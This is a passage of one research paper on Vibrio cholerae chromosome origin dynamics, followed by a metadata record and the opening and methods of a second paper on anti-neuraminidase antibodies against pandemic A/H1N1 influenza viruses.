While motion in the home phase is random, motion in the segregating phase is directionally biased along the long axis. As noted above, steps are centred about zero in the home phase; that is, they are equally likely to occur towards or away from the nearest pole. In the segregating phase, steps in the length axis are not centred about zero, but rather have average values of 0.25 ± 0.29 and 0.29 ± 0.28 µm for oriC I and oriC II respectively (Fig. 5B, Table 2). Thus these steps are both longer and directionally biased. This means that in the segregating phase, oriC I is more likely to move towards the new pole than the old pole, and oriC II is more likely to move away from the mid-cell. In the width axis, differences in step sizes between the movement phases are not statistically significant (Fig. 5C) indicating that motion perpendicular to the long axis of the cell is not affected by the directional segregation of the origins. This directional bias in motion during segregation indicates that segregation of V. cholerae chromosome origins does not occur by random motion, but rather through a directed process oper-ating strictly along the long axis of the cell. Interestingly, the mobility of the origins is clearly not more constrained during segregation than it is during the phases of the cell cycle between segregation events. Thus, the directed process driving segregation must operate while superimposed on the fairly rapid, random motions that the origins undergo while confined in the home positions, without measurably suppressing these random motions, and without apparently altering the local constraints experienced by the chromosomal segments.
Cell growth contributes to the motion of segregating origins
As discussed above, the home position of oriC I is not influenced by cell length. Conversely, the home position of oriC II moves from the pole at about half the rate of cell growth, consistent with this origin maintaining a position near the mid-cell (Table 1). However, during segregation, oriC I moves about two times faster than cell growth (0.04 ± 0.01 versus 0.02 ± 0.01 µm min −1 ), and oriC II moves about three times faster than the rate of cell growth (0.06 ± 0.03 versus 0.02 ± 0.02 µm min −1 ) ( Table 1). In addition to the directional bias in motion described above, this difference in average rates between origin movement and cell growth indicates a non-diffusive, directed segregation mechanism. Nevertheless, we found that cell growth does contribute to the segregation of the origins. We asked how much of the motion could be accounted for by cell growth alone. While cell wall synthesis is a prominent feature of cell growth, inhibition of cell wall synthesis at the septum in E. coli or along the body of the cell in B. subtilis (Webb et al., 1998) does not affect chromosome segregation. Membrane growth and increases in bulk cytosol are also important features of cell growth. The dynamics of the membranes and cytoplasm growth are not well understood. Assuming that incorporation of new material to the cell is evenly distributed along the body of the cell, we calculated the expected change in position if cell growth was the only factor influencing origin movement. The ratio of the expected difference in position from cell growth to the total difference in position indicates the percentage of motion that can be accounted for by cell growth. We found that during segregation, the median contribution of cell growth to origin movement was 19% [with an intraquartile (25-75 percentile) range of 2.4-44%] for oriC I and 16% (with an intraquartile range of 2.8-32%) for oriC II . Thus cell growth can account for a substantial portion of the movement of the origins, but cannot account for all of the motion observed.
Origins in the home phase move subdiffusively in similarly sized caged domains
To quantitatively characterize how the origin position evolves through time, and to distinguish between diffusive, subdiffusive (caged) and superdiffusive (directed) motion, we extended our analysis to look at the change in position between intervals greater than one frame in sequences collected at 1 or 2 s, 20 s and 5 min intervals. The mean squared displacement (MSD) of origin position is plotted against the time interval (τ) (Figs 6A and B). In the home position, MSD in both axes approaches a horizontal asymptote indicating that movement is restricted to a caged domain (Fig. 6A). However, in the segregating phase, neither origins appears caged (Fig. 6A). While the diameter of the caged domain (two times the square root of the horizontal asymptote) is different in the length and width axes, the origins of both chromosomes have comparable domains of movement. For both origins, the caging diameter in the width axis is similar (∼0.4 µm) and smaller than the width of the cell (∼0.75 µm). Likewise, the caging diameter in the length axis (∼0.6 µm) is only a fraction of the cell length (2.0-5.5 µm). Notably, the diameter of the caged domain in the length axis (∼0.6 µm) approaches the width of the cell (∼0.75 µm). Thus, because of the physical restrictions of the cell, the range of motion is more confined in the width axis and this is reflected in the smaller caging radius in this axis. The similarities in cage dimensions for both origins imply that both experience similar microenvironments, though at different locations in the cell. The slope of MSD versus time plotted on a log scale indicates if random diffusion is governing the movement of the particle (slope = 1), if the movement is less than that expected by diffusion and thus is constrained (slope < 1), or if the motion is directionally biased or otherwise superdiffusive (slope > 1). In the home position, both origins behave subdiffusively on all time scales observed (Fig. 6B). This is likely a consequence of the fact that we are observing the motion of one position in a long polymeric chain. The connection to the rest of the chromosome will limit the range of movement for any particular locus. In the segregating phase, directed motion (evidenced by the bias in step direction) is superimposed on the subdiffusive behaviour of the origins making the slope of MSD versus time difficult to interpret. Indeed, the MSD analysis reveals that origin behaviour is clearly different in the two phases ( Fig. 6A and B), indicating that different kinds of forces govern origin mobility in the home and segregating phases. Together the MSD analyses and the bias in step direction suggest that motion during segregation is not superdiffusive but rather a biased random walk.
When a particle is behaving diffusively, the diffusion coefficient (D) can be derived from the slope of MSD versus time plotted on a linear scale. In our case, however, the origins are behaving subdiffusively so D represents an apparent diffusion coefficient, which is dependent on the time interval of measurement. When displacement is measured in a single dimension, D = MSD/2τ where τ is the time interval between measurements (Berg, 1993). The apparent diffusion coefficient for both origins in both cell axes was generated for each time interval and plotted versus the time interval (Fig. 6C). The apparent diffusion coefficient is comparable for the two origins, and at intervals greater than 10 s it is greater in the length axis than in the width axis. This analysis further supports the idea that motion of origins is differentially constrained in the length and width axes of the cell, but the fine-scale motions of the two chromosomal origins are similar to each other.
Origin motion within individuals partially accounts for the variability in origin position observed in static populations
To assess if motion observed at the home position in these individual cells reflects the range of positions observed in still images for larger populations of cells, we compared the calculated caging radii for individuals observed by time-lapse to the range of origin positions in a large number of static images (Fig. 7). Actual distances between origins and the nearest pole or the mid-cell were measured for a population of 496 cells for oriC I and 523 cells for oriC II . The distributions of origin positions measured along the length axis among the population in these static images of cells are represented by standard deviations of 0.3 µm for all oriC I foci measured from their closest pole and 0.3 µm for oriC II foci measured from the midcell. If each position in the 5 min time-lapse datasets is taken as an independent measurement, the standard deviation for both origins is also 0.3 µm indicating that the time-lapse dataset adequately represents the larger population. However, assuming no variation in the position of the cage among individuals, the expected standard deviation for caged objects is equal to the caging radius/√2. As the caging radius we observe in the length axis by analysing the plots of MSD versus τ is 0.3 µm, the expected deviation for positions in the length axis would be 0.21 µm if the variation in the population were due to motion alone. Thus, the variation in the population reflects primarily the intrinsic origin mobility, but there is also some contribution from cell-to-cell variation.
Discussion
Here we report detailed time-lapse analysis of the gross and fine-scale dynamics of V. cholerae chromosome origins throughout the cell cycle, both of which are summarized in Fig. 8. Our analysis of fine-scale origin movements revealed (i) between segregation events, origins are not fixed in place but rather move subdiffusively within caged domains (ovals in Fig. 8) and (ii) during segregation, both origins move at comparable rates with directed motion superimposed on the rapid random subdiffusive motion characteristic of origin behaviour during maintenance at the home position. Several features of the caged domains are unexpected. First, the domains of each origin are of similar dimensions suggesting that the constraints and microenvironment experienced by each are similar, despite the dramatic differences in size, location and gross-scale behaviour of the two chromosomes. Second, motion is unequal in the two axes of the cell. It is not clear what leads to this phenomenon, but caging effects of the cell edges likely limit motion in the width axis of the cell. The gross origin behaviours we observed support those described by Fogel and Waldor (2005). Specifically, oriC I is found near, but not at, the old pole (Fig. 8, blue ovals) and segregates asymmetrically from that pole early in the cell cycle (Fig. 8B, green arrow). oriC II is found near the mid-cell before segregation (Fig. 8, red ovals) and segregates symmetrically to the quarter positions later in the cell cycle (Fig. 8B, double headed green arrow).
How are chromosome origins positioned in the V. cholerae cell?
In bacteria, the poles are physically distinct from the rest of the cell providing a framework that enables the accumulation or exclusion of particles at or away from the pole (reviewed by Shapiro et al., 2002). In addition, in some rod-shaped bacteria, the MinCDE system facilitates the identification of the mid-cell (reviewed by Margolin, 2001). But how are components targeted to and maintained at positions that are neither the pole nor the mid-cell? What is the mechanism for measuring and enforcing the position of non-randomly distributed particles? At least two frames of measurement are theoretically possible; particles could be targeted positions that are fixed actual distances from distinct cell features, or alternatively they could be targeted to positions at fractional distances from a cell feature. Evidence presented here indicates that in V. cholerae, both frames of measurement are used to position the origins of the two chromosomes.
In V. cholerae, oriC I is neither localized to a pole or to the mid-cell, but rather is found in a defined domain near the pole (Fig. 8). The position of the domain is insensitive to the length of the cell indicating that the ruler which positions oriC I measures actual (as opposed to fractional) distances. How actual distances are measured in the cell, however, is not clear. Because the oriC I domain is a constant distance from the pole, it seems likely that the pole is somehow involved in positioning this origin. One possibility is that the chromosome is excluded from the pole in a manner independent of cell cycle and that oriC I , the most distal portion of the nucleoid mass (Fogel and Waldor, 2005), is segregated to the most polar portion of the cell before it is physically excluded. It is not clear what would prevent the chromosome from occupying the polar cap region. Accumulation of ribosomes (Lewis et al., 2000;Mascarenhas et al., 2001) or other proteins at the poles could exclude oriC I from the most polar regions of the cell, although it seems surprising that the amount of these components should not increase as the cell grows. Another possibility is that a measuring protein of a specific length indicates the position of the oriC I domain from the pole. Such a protein anchored at the pole could enable the cell to physically measure the position of oriC I . Similar distance measuring proteins are used by bacteriophages to determine tail length (Abuladze et al., 1994;Vianelli et al., 2000) and by skeletal muscle cells to measure precise lengths in the sarcomere (Wang, 1996). However, because the distance between oriC I and the pole is not precise and varies through time, we favour the hypothesis oriC II oriC II that this origin is simply excluded from the most distal region of the cell. Simultaneously, oriC II is positioned in the vicinity of the mid-cell regardless of the length of the cell (Fig. 8). In E. coli and B. subtilis, the FtsZ ring is positioned at the mid-cell by the MinCDE system, and a host of other proteins then form a complex upon the FtsZ ring to prepare the cell for division (reviewed by Margolin, 2001;Errington et al., 2003). Both FtsZ and MinCDE are found in the V. cholerae genome (Heidelberg et al., 2000), thus one possibility is that the cell directly or indirectly positions oriC II using components of either the FtsZ ring or of the Min system. In E. coli, the positioning of FtsZ to the midcell is strikingly accurate. While, to our knowledge, FtsZ has not been localized in V. cholerae, it should be noted that oriC II is not always positioned at precisely the midcell. In some cells it tracks the mid-cell closely, but in others it tracks a position slightly closer to the pole (around 40 or 60% of the cell length) and still in others oriC II moves between positions at 40-50% of the cell length. The lack of precision may reflect an imprecise readout of the Min system. Alternatively, it could indicate that the positioning mechanism is independent of the Minestablished mid-cell complexes. In addition, the variation in position may reflect that the anchoring point of chromosome II is not the origin.
Alternatively, the parA and parB partitioning genes on chromosome II could act to position oriC II at the mid-cell. Interestingly, both V. cholerae chromosomes encode independent partitioning loci proximal to each origin of replication (Heidelberg et al., 2000). While the par genes encoded by chromosome I are more similar to other chromosomally encoded par genes, those from chromosome II are more similar to plasmid-encoded par genes (Gerdes et al., 2000;Heidelberg et al., 2000;Yamaichi and Niki, 2000). ParA from the E. coli plasmid pB171 oscillates from pole to pole independent of minCDE (Ebersbach and Gerdes, 2001). Moreover, this ParA positions pB171 at the mid-cell and plays a role in plasmid segregation (Ebersbach and Gerdes, 2004). Thus it is possible that the par loci on chromosome II position oriC II at the mid-cell independent of the division plane machinery.
What is the contribution of cell growth to origin segregation?
The classic hypothesis that cell wall growth provided the force to segregate chromosomes (Jacob et al., 1963) has been re-evaluated with the development of techniques for visualizing chromosome behaviour in live cells. Origin segregation in several species has been observed to be faster than cell growth (Glaser et al., 1997;Webb et al., 1998;Gordon et al., 2004;Viollier et al., 2004), indicating that bacteria must employ an active mechanism for chro-mosome segregation. In these studies, growth conditions were such that each cell contained one to two copies of its chromosome. While in these cases, an active segregation mechanism is hard to dispute, the quantitative contribution of cell growth (i.e. incorporation of new material throughout the cell) to origin segregation has largely been ignored. Recently, Elmore et al. (2005) tracked E. coli origins in fast-growing cells where two to four origin foci are present in each cell. These researchers did not observe a period of rapid and directed movement and determined that cell growth alone could account for the segregation of origin foci under these conditions. Several differences could account for the discrepancies between experimental systems. In fast-growth conditions when more origins copies are present, each would have a shorter distance to travel before establishing a new home. It is possible that in these conditions, the period of active movement is short enough that it is masked when looking for consecutive intervals of directed movement. Similarly, if the caged regions of the segregated origins overlap with the caged region of the parental origin focus, directed movement between parental and progeny domains may not be detectable. Alternatively, the cell may use different mechanisms to segregate chromosomes under different growth conditions. Cells may only need to rely on a directed mechanism under slower growth conditions. Under our experimental conditions, V. cholerae origin segregation is only two to three times faster than cell growth and is slower (0.04 and 0.06 µm min −1 for oriC I and oriC II respectively) than the segregation observed in other species (0.1-0.3 µm min −1 ; Webb et al., 1998;Gordon et al., 2004;Viollier et al., 2004). We calculated that cell growth could account for nearly 20% of the motion observed during segregation of V. cholerae origins. Because origin segregation is more rapid in other species, cell growth likely makes a smaller contribution. While cell growth contributes substantially to origin segregation, it alone cannot account for all of the motion observed.
How is the motion of DNA segments restricted within the cell?
By tracking the position of both origins through time, we observe that while each origin occupies a unique region of the cell, the position of neither origin is fixed. Motion in both axes is random in direction and both origins exhibit subdiffusive behaviour, indicating that the motion of these loci is confined. The subdiffusive behaviour may reflect the concentrated nature of the DNA in the cell and the constraints of packing a polymer that is three orders of magnitude longer than the length of the cell into the volume of the cell. If the diffusion coefficient, D, reflected free diffusion, it would correlate to the size of the molecule. In this case, the chromosomes differ in length by a factor of ∼3, yet the apparent diffusion coefficients are similar for both origins (Fig. 6C). However, if DNA is tethered at multiple discrete sites, then D is not dependent on the size of the whole polymer, but rather the length between tethering points (Marshall et al., 1997). The similar diffusion coefficients for both origins suggest that the density of connections between DNA and other parts of the cell (either directly to membranes or to transcription/translation complexes) is comparable for the two origin regions. Moreover, the apparent diffusion coefficients we observed in the long axis of the cell for V. cholerae origins between 20 and 100 s (1-4 × 10 −4 µm 2 s −1 ) are comparable to those observed for loci in yeast chromosomes and for a yeast cen plasmid calculated from similar time scales (5 × 10 −4 and 3 × 10 −4 µm 2 s −1 respectively; Marshall et al., 1997). At longer time intervals (∼1-9 min), the apparent diffusion coefficient for the origin region of fast-growing E. coli chromosomes is 3-4 × 10 −5 µm 2 s −1 (Elmore et al., 2005), similar to the apparent diffusion coefficients we observed for V. cholerae on this time scale. Overall, these data indicate that prokaryotic and eukaryotic DNA experience similar constraints within the cell.
How does movement of the origins reflect the domain structure of the Vibrio chromosomes?
Previous experiments using multiple different techniques suggest that there is large-scale domain organization in bacterial chromosomes. The organization of the domain surrounding the terminus of the chromosome is important for progression through the cell cycle (Lesterlin et al., 2005). The data presented here indicate that the origin regions of both V. cholerae chromosomes each occupy a physical domain that encompasses about 0.6 µm or 1/3 of the length of a newly divided cell (Fig. 8) and that the origin moves randomly within this domain. Analysis of chromosomal positions in fixed cells of other bacterial species also supports a large-scale domain for each locus that occupies roughly 1/3 of the cell Viollier et al., 2004). Complementary with these positional observations, analysis of recombination frequencies between distant chromosomal positions indicates that the bacterial chromosome is organized into a small number of macro-domains between which recombination is limited (Valens et al., 2004). The size of the macro-domains predicted by recombination frequencies (∼1/4-1/6 of the chromosome) is on the same order as the range of movement observed during chromosome localization (∼1/3 of the length axis in small cells and 1/6 of the length in longer cells). Curiously, domains on opposite sides of the chromosome, which due to the circular nature of the chromosome presumably occupy similar regions along the length axis of the cell, do not recombine with each other (Valens et al., 2004). In the absence of a mechanism to distinguish opposite halves of the chromosome, this result implies spatial restriction in the width axis. The caging radii we observe in width axis predict domains that occupy about half of the cell width. This observation further supports the model that spatial restriction of the chromosome limits recombination between opposite halves of the chromosome. Together these results indicate large-scale organization of domains in bacterial chromosomes, though the functional consequences of these domains are not yet clear. Lastly, it is notable that the size of eukaryotic chromosome territories are 0.4-0.8 µm (Zink et al., 1998) which is very comparable to the domain dimensions reported here (0.4 µm by 0.6 µm). This again indicates that prokaryotic and eukaryotic chromosomes experience similar constraints.
Strain construction
Arrays of tandem copies of lacO or tetO sequences were integrated into the sequenced strain of V. cholerae, N16961 (provided by G. Schoolnik) (Heidelberg et al., 2000). For integration into V. cholerae, several modifications were made to pLau43 and pLau44 vectors carrying the lacO and tetO arrays (Lau et al., 2003). First, to generate vectors that could not autonomously replicate in V. cholerae, the pUC18 origins were replaced with the R6K origin, which requires the pir gene product for replication. The XhoI/BamHI fragment from pR6K (Epicentre, Madison, WI) was cloned into the large SalI/BamHI fragment from pLau43 and the XhoI/SalI fragment from pR6K was cloned into the large SalI/XhoI fragment from pLau44 to generate pAF104 and pAF105 respectively. These and subsequent vectors were propagated in EC100D pir+ (Epicentre, Madison, WI) or Pir2 (Invitrogen, Carlsbad, CA), two strains of E. coli which support R6K origins of replication. Second, the kanamycin-resistance gene in the lacO array was replaced with the chloramphenicol-resistance gene, cat. cat from pACYC184 (New England Biolabs, Beverly, MA) was PCR amplified and subcloned into pCR-Blunt II-TOPO (Invitrogen, Carlsbad, CA), excised with NsiI, and ligated into the NsiI sites in the KmR gene in pAF104 to generate pAF106. Third, an oriT was added to allow the array bearing vectors to be transferred to V. cholerae by conjugation. A SpeI fragment containing oriT from pHPV412 (provided by Patrick Viollier) was cloned into the SpeI site of pAF106 and pAF05 generating pAF119 and pAF118 respectively. Last, ∼1000 bp regions of genomic sequence from V. cholerae were added to these vectors to target integration to a specific locus. Chromosomal sequences were PCR amplified, subcloned into pCR-Blunt II-TOPO, removed with XbaI and SpeI, and ligated into the NheI site in either pAF119 or pAF118. Integration was targeted to regions between genes on opposite strands such that the arrays were integrated into overlapping terminator regions as opposed to promoter regions. Because these intergenic regions are small (usually < 50 bp), portions of the flanking genes were amplified together with the intergenic region to enlarge the homologous region and thereby increase integration effi-ciency. This strategy minimizes the chances of disrupting function or regulation of the genes near the integration site.
These constructs were then transferred by conjugation from the Pir2 E. coli strain into V. cholerae N16961 using the helper strains LS256 or LS980 (provided by Lucy Shapiro). Integrants were selected with 2 µg ml −1 chloramphenicol and/ or 20 µg ml −1 gentamycin as appropriate. E. coli was counterselected with 100 µg ml −1 streptomycin. The tetO array was integrated between VCA1103 and VCA1104 (∼12 kb from the oriC II ) in AVC89 and between VC2761 and VC2762 (∼13 kb from the oriC I ) in AVC93. The lacO array was inserted between VC2761 and VC2762 (∼13 kb from the oriC I ) in AVC89 and between VCA0010 and VCA0011 (∼9 kb from the oriC II ) in AVC93. pLAU53 (Lau et al., 2003), which carries TetR-YFP and LacI-CFP under the control of the pBAD promoter, was electroporated into strains containing the arrays and selected with 100 µg ml −1 carbenicillin. AVC93 was used for time-lapse analysis of oriC I and AVC89 was used for timelapse analysis of oriC II .
Growth conditions/sample preparation
Overnight cultures were inoculated from freshly plated freezer stocks in M9 glucose minimal media (Sambrook and Russell, 2001) supplemented with an additional 0.5% glucose, 0.01% casamino acids and appropriate antibiotics and grown on a roller at 37°C. Overnight cultures were diluted ∼1:100 in the fresh media and grown to early log (OD 600 0.2-0.3). A small aliquot (1-1.5 ml) was gently pelleted for 1 min at 3500 g. Cells were resuspended in fresh media without antibiotics. Arabinose was added to a final concentration of 0.2% to induce expression of TetR-YFP and LacI-CFP. Expression of the fluorescent proteins was induced for 30-45 min at room temperature without shaking. One microlitre of cells was then placed on a 1-2% agarose pad made with the same media for observation. The doubling time for cells on the microscope was 80-100 min. Expression of the fluorescent proteins from the pBAD promoter was leaky in these strains and fluorescent foci were frequently observed in the absence of arabinose.
Microscopy
Cells were visualized on a Nikon Diaphot 300 inverted microscope at room temperature using a 60× objective. The image was further magnified by a 2× lens in front of the camera. YFP and CFP were visualized using filter set number 52017, which includes single-band exciters (Chroma, Rockingham, VT). Metamorph version 6.1 (Molecular Devices, Sunnyvale, CA) was used to drive the filter wheels and shutters. Images were collected on a cooled CCD camera (Princeton Instruments, Princeton, NJ). To understand the general localization patterns of each origin, images of a large numbers of still cells were acquired visualizing both YFP and CFP sequentially using exposure times of 0.4-2 s. For time-lapse analysis, we followed the origins tagged with the tetO arrays and visualized with TetR-YFP. Origins visualized with YFP were bright and easy to detect due to negligible background in early logarithmic phase. The CFP signal, on the other hand, is dimmer and harder to detect due to high background gen-erated by autofluorescence of endogenous molecules in V. cholerae. Furthermore, frequent exposure to the CFP excitation light was phototoxic; in our experimental set-up, cells cease to grow with blue light exposures of 250 ms at intervals of 10 min or less. As we were interested in the dynamic behaviour on short-time scales, YFP was the superior fluorescent tag. Time-lapse sequences were acquired with fluorescence exposure times of 400 ms.
Image analysis
Time-lapse studies. All image analysis was done with Matlab version 7.0 (The MathWorks, Natick, MA) using the image analysis toolbox. A Gaussian filter was applied to the raw fluorescence images and spots were detected by thresholding. Spot positions were calculated as the centroid of the thresholded region. The cell poles and centreline were determined manually for each cell in each frame of the time-lapse image sequences. The centrelines were determined with 6-10 linear segments. A line from the centroid of the fluorescent spot was drawn normal to the centreline. The distance between the spot centroid and the centreline indicated the position of the spot in the width axis. The distance between the normal line and the pole, along the centreline, indicated the position of the spot in the length axis (Fig. 2). To follow an origin through a time-lapse movie, spots were tracked by automatically associating each spot with the closest spot in the following frame in the XY plane. When spots divided, a new track was initiated and the parental spot was added to both daughter tracks.
Population studies. To identify cell bodies, phase images were thresholded. The identified regions were filtered according to size and width to eliminate touching cells. We then used an automated algorithm to identify the poles and the centrelines for each cell. First, the poles were identified as the two most distant points on the outline of the thresholded mask. Then, for each pixel along one side of the outline, the nearest pixel on the opposite side of the bacterium was identified, and the midpoint between them was calculated. The sum of the distance between the midpoints generates the length of the bacterium and the line drawn through the midpoints generates the centreline of the bacterium. Spots were identified and their positions were measured as in the time-lapse.
Motion analysis
For quantitative analysis, the segregation phase begins with initial separation (i.e. the interval during which one focus separates into two distinct foci) and ends when the chromosome reaches a new home domain.
For oriC I , length measurements in the home position were always from the closest pole and length measurements in the travelling phase were always from the old pole. Thus when segregation was observed, both spots were measured from the old pole. As soon as the segregating spot established a new home position, its distance was measured from the new pole to enable comparisons with other home phase origins. For oriC II , at the beginning of a time-lapse sequence, an arbitrary pole was chosen as the reference point. During the segregation phase, the reference point was the pole from which the origin was moving away. Thus pairs of sister origins were measured from opposite poles during segregation. This allowed comparisons of all origins during segregation. When a new home is established, the closest pole became the reference point for regression analysis. After a cell division, the new pole was used as the reference point for oriC II .
To estimate the motion attributable to cell growth, we calculated the expected position if uniform growth along the body of the cell was responsible for the change in position using the following equation [distance (n) /cell length (n) ] × cell length (n+1) = expected distance (n+1) . Expected distance (n+1) / actual distance (n+1) gives the proportion of motion that can be attributed to cell growth.
For MSD (Qian et al., 1991;Berg, 1993), we calculated the average change in origin position in overlapping sequential intervals of one to six frames from all time-lapse movies for each time interval, 1 or 2 s, 20 s and 5 min. For oriC I , differences in position were based on the nearest/home pole. For oriC II , differences in position in the length axis were measured from the mid-cell.
Extrapolation from the shortest time intervals indicates that MSD values do not go through the origin of the graph but rather cross the y axis at about 0.01 µm 2 (Fig. 6, see inset). This gives an upper limit for the measurement noise, which is 0.1 µm or about 1 pixel in our experimental set-up. This estimate is consistent with the error associated with the process of measuring the positions of the spot in the cell frame of reference. | 2014-10-01T00:00:00.000Z | 2006-04-21T00:00:00.000 | {
"year": 2006,
"sha1": "51073e2a79e8fe5e8d4179474f3a957728280cb9",
"oa_license": "CCBY",
"oa_url": "https://onlinelibrary.wiley.com/doi/pdfdirect/10.1111/j.1365-2958.2006.05175.x",
"oa_status": "BRONZE",
"pdf_src": "PubMedCentral",
"pdf_hash": "51073e2a79e8fe5e8d4179474f3a957728280cb9",
"s2fieldsofstudy": [
"Biology"
],
"extfieldsofstudy": [
"Biology",
"Medicine"
]
} |
13670740 | pes2o/s2orc | v3-fos-license | Anti-neuraminidase antibodies against pandemic A/H1N1 influenza viruses in healthy and influenza-infected individuals
The main objective of the study was to evaluate neuraminidase inhibiting (NI) antibodies against A/H1N1pdm09 influenza viruses in the community as a whole and after infection. We evaluated NI serum antibodies against A/California/07/09(H1N1)pdm and A/South Africa/3626/2013(H1N1)pdm in 134 blood donors of different ages using enzyme-linked lectin assay and in 15 paired sera from convalescents with laboratory confirmed influenza. The neuraminidase (NA) proteins of both A/H1N1pdm09 viruses had minimal genetic divergence, but demonstrated different enzymatic and antigenic properties. 5.2% of individuals had NI antibody titers ≥1:20 against A/South Africa/3626/2013(H1N1)pdm compared to 53% of those who were positive to A/California/07/2009(H1N1)pdm NA. 2% of individuals had detectable NI titers against A/South Africa/3626/13(H1N1)pdm and 47.3% were positive to A/California/07/2009(H1N1)pdm NA among participants negative to hemagglutinin (HA) of A/H1N1pdm09 but positive to seasonal A/H1N1. The lowest NI antibody levels to both A/H1N1pdm09 viruses were detected in individuals born between 1956 and 1968. Our data suggest that NI antibodies against A/South Africa/3626/13 (H1N1)pdm found in the blood donors could have resulted from direct infection with a new antigenic A/H1N1pdm09 variant rather than from cross-reaction as a result of contact with previously circulating seasonal A/H1N1 variants. The immune responses against HA and NA were formed simultaneously right after natural infection with A/H1N1pdm09. NI antibodies correlated with virus-neutralizing antibodies when acquired shortly after influenza infection. A group of middle-aged patients with the lowest level of anti-NA antibodies against A/California/07/2009 (H1N1)pdm was identified, indicating the highest-priority vaccination against A/H1N1pdm09 viruses.
Introduction
According to WHO-recognized National Influenza Centers in Moscow and Saint Petersburg, 2015/2016 epidemic season in Russia characterized by rapid increase of influenza and acute respiratory infection (ARI) morbidity from week 3 of 2016.Increases in influenza-like illness and hospitalization rates were similar to those observed during the 2009 pandemic and epidemic in 2010-2011 and were much higher than in other seasons [1].According to the phylogenetic analysis of amino acid sequences of the main antigenic glycoprotein hemagglutinin (HA), many of A/H1N1 viruses isolated in Russia in 2015-2016 belong to the clade 6B of A/ H1N1pdm09 (A/South Africa/3626/2013-like) [1].Antibodies directed against HA provide the main protection against influenza illness.However, as it was shown in 1973, antibodies against minor immunogenic viral glycoprotein, neuraminidase (NA), can also provide protection against influenza infection [2].Namely, antibodies against NA block viral progeny release from cells during detachment of mature viral particles from the cell surface.At the initial stage of influenza infection cycle, anti-NA antibodies may prevent connection of HA with cellular receptors [3], block proapoptotic NA function [4], and inhibit NA plasminogen activation [5].Furthermore, antibodies against NA can facilitate recognition of infected cells by macrophages and natural killer (NK) cells, mediating the activation of the complement system during complement-dependent cytotoxicity [6].
The hemagglutination-inhibition (HI) assay is most commonly used to assess previous exposure and protective immunity to influenza viruses as well as to evaluate influenza vaccine immunogenicity.However, the presence of NA inhibiting (NI) antibodies is the least explored.The 2009 influenza pandemic caused by A/H1N1pdm09 initiated a number of studies on the antibodies against viruses containing the N1 NA.The importance of NA immunity against naturally occurring influenza was previously demonstrated by evaluating HI and NI antibody titers in a study conducted during 2009-2011 [7].The presence of a population possessing the cross-reactive NI antibodies, which were acquired as a result of previous infection or vaccination with previously circulated influenza viruses, can be decisive in reducing illness and mortality, as shown during a pandemic caused by the A/H3N2 virus in 1968 [2].In addition, a number of studies were conducted to identify cross-reactive anti-NA antibodies against the new influenza virus like A/H1N1pdm09 [8] and to examine the formation and function of protective antibodies against NA by immunization with influenza vaccines [9,10].At the WHO meetings in 2005 and 2009, leading experts noted the increasing importance of developing and improving methods for detection of antibodies against influenza virus NA [11].It is important to study immunity against NA because NI antibodies are considered to be independent predictors of anti-influenza immunity [7,8].The aim of the present study was to evaluate serum anti-NA antibodies against two A/H1N1pdm09 strains, A/California/07/09 (H1N1)pdm and A/South Africa/3626/2013 (H1N1)pdm, in the Russian population.
Viruses
To evaluate the NI antibodies against A/H1N1pdm09 viruses, we developed chimeric viruses with HA non-relevant to seasonal influenza viruses.The A/H7N1 reassortant virus containing HA from A/horse/Prague/1/56 (H7N7) and NA from A/California/07/2009 (H1N1)pdm was prepared using classical genetic reassortment in developing chick embryos as described elsewhere [12].The A/H6N1 virus harboring HA gene from A/herring gull/Sarma/51c/2006 (H6N1) and NA from A/South Africa/3626/13 (H1N1)pdm was generated using a standard plasmid-based genetic technique [13].
Sequence analysis
The DNA-copies of the viral RNA segments were obtained using the OneStep RT-PCR Kit (Qiagen, Netherlands).Following the electrophoresis of the DNA-copies in 1.5% agarose gel and consecutive purification by QIAquick PCR purification Kit (Qiagen), the sequencing was conducted on DNA-analyzer ABI 3730xl using the BigDye Terminator v3.1 Cycle Sequencing kit (Applied Biosystems, USA).The processing of the nucleotide sequence data was performed using the 3730 Data Collection v3.0 software package (Applied Biosystems).
NA enzyme activity and kinetics
The NA activity of influenza H1N1 viruses was measured by a fluorescence-based assay using the fluorogenic substrate MUNANA (Sigma-Aldrich, USA), based on the method of Potier et al. [16] as described previously [17].Briefly, A/California/07/09 (H1N1)pdm and A/South Africa/3626/2013 (H1N1)pdm viruses were standardized to an equivalent NA protein content of 0.015 ng/μl as determined by protein gel electrophoresis using purified and concentrated viruses.This virus dilution was selected as a dilution that converted 15% MUNANA substrate to product during the reaction time in order to meet the requirements for steady-state kinetic analysis [17].Virus dilutions were prepared in enzyme buffer [32.5 mM of 2-(N-morpholino) ethanesulfonic acid (MES), 4 mM of calcium chloride, pH 6.5] and added (100 μl/ well) in duplicate to a flat-bottom 96-well opaque black plate (Corning, USA).After preincubation for 20-30 min at 37˚C, the MUNANA substrate at various concentrations (separately pre-incubated for 20-30 min at 37˚C) was added to all wells (50 μl/well).Immediately after adding the MUNANA substrate, the plate was transferred to a 37˚C pre-warmed SpectraMAX Gemini XPS microplate reader (Molecular Devices, USA) and fluorescence was measured every 60 s for 60 min at 37˚C, using excitation and emission wavelengths of 360 nm and 460 nm, respectively.Enzymatic reactions were performed under conditions where signal-to-noise ratios were above 10 during more than 30 min of the reaction time.Time course data from each concentration of the MUNANA substrate were examined for linearity by linear regression analysis.Data with R 2 >0.99 were used for analysis.The kinetic parameters Michaelis-Menten constant (K m ) and maximum velocity of substrate conversion (V max ) of the NAs were calculated by fitting the data to the appropriate Michaelis-Menten equations by using nonlinear regression in Prism 6.0 software (GraphPad Software, USA).Values are the means of three independent determinations.
Ethics statement
The study involved a retrospective analysis of participant serum samples left from routine tests.Blood serum samples were collected from the 134 patients of the Institute for Experimental Medicine Medical Research Center for routine tests from January 6, 2016 till April 1 2016.These serum samples included 16 sera from 24-39 years old persons, 31 sera from 40-59 years old participants and 87 sera from patients aged 60-84 years.None of participants was vaccinated against influenza in 2016.Left sera were stored at -20˚C.After receiving the approval from the Ethics Committee of the Institute for Experimental Medicine No. 2/16 of May 12, 2016, these sera were provided to study neuraminidase antibodies.We also tested the 42 archive serum samples obtained from non-vaccinated volunteers 20-59 years old in October 2010.The 15 paired sera from the convalescents with laboratory confirmed A/H1N1pdm09 influenza infections collected in January-February 2016 at hospitalization and 4-8 days later were provided by The Institute of Influenza.The age of these patients was 19 to 83 years.Written informed consent was obtained for each participant.The participants were fully informed of the research procedures and any risks associated with participation, and consented to participate in scientific projects.
None of the authors collected the samples used in the study, had access to information that would allow the identification of individual patients during the extraction of data from medical records, the data was de-identified before access by any of the authors.
Detection of serum antibodies against A/H1N1 viruses
